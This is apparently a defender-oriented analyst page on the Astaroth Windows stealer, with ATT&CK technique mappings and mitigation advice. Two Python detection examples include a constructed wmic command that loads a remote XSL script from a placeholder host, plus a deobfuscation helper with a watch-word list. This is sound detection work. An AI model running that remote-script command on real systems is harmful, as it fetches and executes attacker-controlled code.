S0373: Astaroth
Analyst context for executives and security teams
Astaroth is a Windows Trojan and information stealer publicly known since at least 2017 and described by ATT&CK as affecting organizations in Europe, Brazil, and Latin America. Its business significance is not just malware presence; the mapped behaviors show a full theft workflow: user-driven execution, abuse of legitimate Windows components, obfuscation, discovery, credential and clipboard collection, local staging, command-and-control, and exfiltration.
Executive priority
Prioritize Astaroth as a validation case for endpoint visibility, identity-risk reduction, and incident response readiness on Windows systems. Leaders should ask whether the organization can prove collection of process, script, WMI, command-line, file, and network evidence needed to investigate an information-stealing intrusion, especially where user-opened files and legitimate Windows utilities may be involved. This is also relevant for audit evidence around malware defense, credential protection, data loss monitoring, and regional risk where Europe, Brazil, or Latin America exposure matters.
Technical view
ATT&CK provides no official detection text for Astaroth, so defenders should build coverage from the related techniques. Validate monitoring for Windows execution through WMI, cmd, Visual Basic/JScript, CHM, Regsvr32, and shared module loading; stealth indicators such as software packing, encoded/encrypted files, command obfuscation, deobfuscation, and process hollowing; discovery of system, network, time, and running process information; collection via keylogging and clipboard access; local data staging; ingress tool transfer; C2 through dead-drop resolvers and standard encoding; and exfiltration over the C2 channel.
Likely telemetry
- Windows endpoint process creation and command-line telemetry
- WMI activity and parent-child process relationships
- Script execution telemetry for Visual Basic, JScript/JavaScript, and command shell usage
- Module load and DLL/shared module activity
- Regsvr32.exe and CHM/HTML Help execution events
Detection direction
- Because MITRE provides no official detection guidance for this malware object, start with technique-level analytics rather than a single malware signature.
- Correlate user-opened malicious file behavior with follow-on script, WMI, cmd, Regsvr32, CHM, or module-loading activity on Windows endpoints.
- Tune for suspicious use of legitimate Windows components while accounting for administrative software, help files, scripts, and management tooling that may create false positives.
- Look for chained behavior: obfuscated or encoded content, decoding activity, discovery commands, credential or clipboard collection signals, local staging, then outbound C2 or exfiltration-like traffic.
- Pay special attention to visibility gaps caused by software packing, command obfuscation, encoded files, and process hollowing, since these can reduce the value of simple hash or command-string matching.
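The chain-based detection direction above, as an added example that is not part of the original page or of any vendor tooling: a small Python analytic that walks parent-child process relationships in constructed Sysmon-style process-creation events and flags an abuse-prone Windows utility (wmic.exe or regsvr32.exe) only when it descends, within a short window, from a script or command host that was itself started by a user-driven parent. It also flags wmic.exe invocations whose /format: argument points at a remote XSL stylesheet, matching the T1220 relationship listed on this page. Host names, PIDs, timestamps and command lines are all constructed sample data; the benign admin chain on srv02 is included to show the false-positive handling the third bullet asks for.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple


@dataclass
class ProcEvent:
    """One process-creation event (Sysmon Event ID 1 style); all fields constructed."""
    ts: datetime
    host: str
    pid: int
    ppid: int
    image: str      # executable file name only, lower-case
    cmdline: str


# Parents that indicate a user opened something (T1204.002 context).
USER_DRIVEN = {"explorer.exe", "outlook.exe", "winword.exe"}
# Script / command hosts that sit between the user action and the abused utility.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "hh.exe", "cmd.exe"}
# Legitimate Windows utilities this page lists as abused (T1047, T1218.010).
ABUSED_UTILITIES = {"wmic.exe", "regsvr32.exe"}
# wmic /format: pointing at an http(s) location is the T1220 remote-XSL pattern.
REMOTE_XSL = re.compile(r"/format\s*:\s*[\"']?https?://", re.I)


def ancestors(ev: ProcEvent, by_pid: Dict[Tuple[str, int], ProcEvent],
              max_depth: int = 5) -> List[ProcEvent]:
    """Return the parent chain of ev (nearest parent first), limited to the same host."""
    chain: List[ProcEvent] = []
    cur = ev
    for _ in range(max_depth):
        parent = by_pid.get((cur.host, cur.ppid))
        if parent is None:
            break
        chain.append(parent)
        cur = parent
    return chain


def detect_chains(events: List[ProcEvent], window: timedelta = timedelta(minutes=10)) -> List[dict]:
    """Flag abused utilities that descend from user-driven -> script-host activity."""
    by_pid = {(e.host, e.pid): e for e in events}
    alerts = []
    for ev in events:
        if ev.image not in ABUSED_UTILITIES:
            continue
        chain = ancestors(ev, by_pid)
        script_parent: Optional[ProcEvent] = next(
            (p for p in chain if p.image in SCRIPT_HOSTS), None)
        user_root = any(p.image in USER_DRIVEN for p in chain)
        reasons = []
        # Require the full chain and a tight time window to keep admin scripting quiet.
        if script_parent and user_root and ev.ts - script_parent.ts <= window:
            reasons.append("user-driven -> script host -> " + ev.image)
        if ev.image == "wmic.exe" and REMOTE_XSL.search(ev.cmdline):
            reasons.append("wmic /format: pointing at remote XSL (T1220)")
        if reasons:
            full_chain = [p.image for p in reversed(chain)] + [ev.image]
            alerts.append({"host": ev.host, "pid": ev.pid,
                           "chain": full_chain, "reasons": reasons})
    return alerts


# Constructed sample telemetry: one suspicious chain on ws01, one benign admin chain on srv02.
T0 = datetime(2024, 1, 1, 9, 0, 0)
SAMPLE_EVENTS = [
    ProcEvent(T0 - timedelta(hours=2), "ws01", 100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(T0, "ws01", 200, 100, "wscript.exe",
              'wscript.exe "C:\\Users\\user\\Downloads\\invoice.vbs"'),
    ProcEvent(T0 + timedelta(seconds=2), "ws01", 300, 200, "cmd.exe", "cmd.exe /c start"),
    ProcEvent(T0 + timedelta(seconds=3), "ws01", 400, 300, "wmic.exe",
              'wmic.exe os get /format:"https://example.invalid/s.xsl"'),
    ProcEvent(T0, "srv02", 500, 1, "services.exe", "services.exe"),
    ProcEvent(T0, "srv02", 510, 500, "cmd.exe", "cmd.exe /c inventory.bat"),
    ProcEvent(T0, "srv02", 520, 510, "wmic.exe", "wmic.exe product get name,version"),
]

if __name__ == "__main__":
    for alert in detect_chains(SAMPLE_EVENTS):
        print(alert["host"], alert["pid"], " -> ".join(alert["chain"]), alert["reasons"])
```

The window and the requirement for both a user-driven root and a script host are the tuning knobs: loosening either one raises recall on variants that skip a stage, at the cost of surfacing management tooling that legitimately calls wmic.exe from scheduled batch files.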
Mitigation priorities
- Reduce user-execution risk through hardened email/web delivery controls and user-focused handling of suspicious files, consistent with the mapped malicious-file execution behavior.
- Restrict and monitor abuse-prone Windows utilities and scripting paths such as WMI, command shell, Visual Basic/JScript, CHM handling, and Regsvr32 where business operations allow.
- Strengthen endpoint protection and logging for packed/encoded files, process hollowing, module loading, and suspicious parent-child process chains.
- Protect credentials by prioritizing controls and monitoring around keylogging risk, clipboard exposure, and unusual authentication activity following suspected infection.
- Ensure network egress monitoring can identify unusual dead-drop resolver, tool transfer, encoded C2, and exfiltration-over-C2 patterns.
Analyst notes and limits
Astaroth is a useful ATT&CK object for testing whether a SOC can connect endpoint, identity, and network evidence into one intrusion narrative. The strongest defensive value comes from validating telemetry coverage across the related techniques, not from treating the malware name alone as a detection strategy.
The supplied ATT&CK object has no official detection text, no aliases, no labels, and no explicit tactics listed on the malware object itself. Technique relationships provide behavioral context, but local prevalence, active campaigns, exact indicators, and confirmed exposure require environment-specific intelligence and telemetry.
Astaroth
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1102.001 | Dead Drop Resolver Sub-technique | Astaroth can store C2 information on cloud hosting services such as AWS and CloudFlare and websites like YouTube and Facebook. [3] |
| Enterprise | T1124 | System Time Discovery | Astaroth collects the timestamp from the infected machine. [2] |
| Enterprise | T1564.003 | Hidden Window Sub-technique | Astaroth loads its module with the XSL script parameter. |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | Astaroth has used an XOR-based algorithm to encrypt payloads twice with different keys. [3] |
| Enterprise | T1115 | Clipboard Data | Astaroth collects information from the clipboard by using the OpenClipboard() and GetClipboardData() libraries. [1] |
| Enterprise | T1082 | System Information Discovery | Astaroth collects the machine name and keyboard language from the system. [2] [1] |
| Enterprise | T1497.001 | System Checks Sub-technique | Astaroth can check for Windows product IDs used by sandboxes and usernames and disk serial numbers associated with analyst environments. [3] |
| Enterprise | T1129 | Shared Modules | Astaroth uses the LoadLibraryExW() function to load additional modules. [1] |
| Enterprise | T1059.005 | Visual Basic Sub-technique | Astaroth has used malicious VBS e-mail attachments for execution. [3] |
| Enterprise | T1057 | Process Discovery | Astaroth searches for different processes on the system. [1] |
| Enterprise | T1204.002 | Malicious File Sub-technique | Astaroth has used malicious files including VBS, LNK, and HTML for execution. [3] |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Astaroth uses a fromCharCode() deobfuscation method to avoid explicitly writing execution commands and to hide its code. [1] [3] |
| Enterprise | T1132.001 | Standard Encoding Sub-technique | Astaroth encodes data using Base64 before sending it to the C2 server. [2] |
| Enterprise | T1027.002 | Software Packing Sub-technique | Astaroth uses a software packer called Pe123\RPolyCryptor. [1] |
| Enterprise | T1218.010 | Regsvr32 Sub-technique | Astaroth can be loaded through regsvr32.exe. [1] |
| Enterprise | T1518.001 | Security Software Discovery Sub-technique | Astaroth checks for the presence of Avast antivirus in the |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | Astaroth has been delivered via malicious e-mail attachments. [3] |
| Enterprise | T1056.001 | Keylogging Sub-technique | Astaroth logs keystrokes from the victim's machine. [2] |
| Enterprise | T1574.001 | DLL Sub-technique | Astaroth can launch itself via DLL Search Order Hijacking. [3] |
| Enterprise | T1059.007 | JavaScript Sub-technique | Astaroth uses JavaScript to perform its core functionalities. [2] [3] |
| Enterprise | T1041 | Exfiltration Over C2 Channel | Astaroth exfiltrates collected information from its r1.log file to the external C2 server. [1] |
| Enterprise | T1220 | XSL Script Processing | Astaroth executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain. [1] |
| Enterprise | T1016 | System Network Configuration Discovery | Astaroth collects the external IP address from the system. [2] |
| Enterprise | T1055.012 | Process Hollowing Sub-technique | Astaroth can create a new process in a suspended state from a targeted legitimate process in order to unmap its memory and replace it with malicious code. [1] [3] |
| Enterprise | T1547.009 | Shortcut Modification Sub-technique | Astaroth's initial payload is a malicious .LNK file. [2] [1] |
| Enterprise | T1047 | Windows Management Instrumentation | Astaroth uses WMIC to execute payloads. [2] |
| Enterprise | T1555 | Credentials from Password Stores | Astaroth uses an external software known as NetPass to recover passwords. [1] |
| Enterprise | T1105 | Ingress Tool Transfer | |
| Enterprise | T1552 | Unsecured Credentials | Astaroth uses an external software known as NetPass to recover passwords. [1] |
| Enterprise | T1027.010 | Command Obfuscation Sub-technique | Astaroth has obfuscated and randomized parts of the JScript code it is initiating. [1] |
| Enterprise | T1564.004 | NTFS File Attributes Sub-technique | Astaroth can abuse alternate data streams (ADS) to store content for malicious payloads. [3] |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | Astaroth creates a startup item for persistence. [2] |
| Enterprise | T1218.001 | Compiled HTML File Sub-technique | Astaroth uses ActiveX objects for file execution and manipulation. [2] |
| Enterprise | T1568.002 | Domain Generation Algorithms Sub-technique | Astaroth has used a DGA in C2 communications. [1] |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | Astaroth spawns a CMD process to execute commands. [1] |
| Enterprise | T1074.001 | Local Data Staging Sub-technique | Astaroth collects data in a plaintext file named r1.log before exfiltration. [2] |
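The T1140 (fromCharCode deobfuscation), T1027.010 (command obfuscation) and T1132.001 (Base64 encoding) relationships in the table above explain why plain string matching on the script or on staged data misses this family. As an added example that is not part of the original page, the following Python analyst helper decodes numeric String.fromCharCode(...) calls and printable Base64 blobs in a captured script and then runs a watch-word scan over the decoded layer. The sample script and the watch-word list are constructed for illustration; the decoded strings are chosen to match utilities and the r1.log staging file name that this page's own table mentions.

```python
import base64
import re
from typing import Dict, List

# String.fromCharCode(119,109,105,99) and the hex-literal form String.fromCharCode(0x77,...)
FROMCHARCODE = re.compile(r"String\.fromCharCode\s*\(([^)]*)\)", re.I)
# Runs of Base64 alphabet long enough to be worth decoding (24+ chars plus padding).
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# Constructed watch words drawn from the techniques listed on this page.
WATCH_WORDS = ("wmic", "regsvr32", "wscript", "cscript", "loadlibrary", "r1.log")


def _parse_code(tok: str) -> int:
    """Accept decimal or 0x-prefixed hex character codes."""
    tok = tok.strip()
    return int(tok, 16) if tok.lower().startswith("0x") else int(tok)


def decode_fromcharcode(script: str) -> List[str]:
    """Recover every string built from a numeric-only String.fromCharCode(...) call."""
    decoded = []
    for m in FROMCHARCODE.finditer(script):
        try:
            codes = [_parse_code(t) for t in m.group(1).split(",") if t.strip()]
        except ValueError:
            continue  # arguments were variables or expressions, not literals
        if codes and all(0 <= c < 0x110000 for c in codes):
            decoded.append("".join(chr(c) for c in codes))
    return decoded


def decode_base64_blobs(text: str) -> List[str]:
    """Decode Base64 runs that yield printable UTF-8; skip everything else."""
    decoded = []
    for m in B64_BLOB.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
            s = raw.decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # binascii.Error is a ValueError subclass
        if s.isprintable():
            decoded.append(s)
    return decoded


def hunt(script: str) -> Dict[str, List[str]]:
    """Decode one obfuscation layer and report which watch words appear only after decoding."""
    layers = decode_fromcharcode(script) + decode_base64_blobs(script)
    hits = sorted({w for layer in layers for w in WATCH_WORDS if w in layer.lower()})
    return {"decoded": layers, "hits": hits}


# Constructed sample script: nothing in the raw text matches a watch word literally.
SAMPLE_SCRIPT = (
    "var a = String.fromCharCode(119,109,105,99);\n"                            # "wmic"
    "var b = String.fromCharCode(0x72,0x65,0x67,0x73,0x76,0x72,0x33,0x32);\n"   # "regsvr32"
    'var c = "' + base64.b64encode(b"collected clipboard text to r1.log").decode() + '";\n'
)

if __name__ == "__main__":
    result = hunt(SAMPLE_SCRIPT)
    print("decoded layers:", result["decoded"])
    print("watch-word hits:", result["hits"])
```

Running the watch-word scan only after decoding is the point: the raw SAMPLE_SCRIPT contains none of the watch words, so a signature applied to the script on disk would return nothing. Real samples may nest several layers, so in practice the decoded output is fed back through hunt() until no new strings appear.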
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources (Updates).
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 2.3 | | Current bundle | 71f65e9ba853… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] Cybereason Astaroth Feb 2019: Salem, E. (2019, February 13). ASTAROTH MALWARE USES LEGITIMATE OS AND ANTIVIRUS PROCESSES TO STEAL PASSWORDS AND PERSONAL DATA. Retrieved April 17, 2019.
- [2] Cofense Astaroth Sept 2018: Doaty, J., Garrett, P. (2018, September 10). We're Seeing a Resurgence of the Demonic Astaroth WMIC Trojan. Retrieved September 25, 2024.
- [3] Securelist Brazilian Banking Malware July 2020: GReAT. (2020, July 14). The Tetrade: Brazilian banking malware goes global. Retrieved November 9, 2020.
- [4] Guildma (Citation: Securelist Brazilian Banking Malware July 2020)
- [5] mitre-attack S0373 (MITRE ATT&CK source object)
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.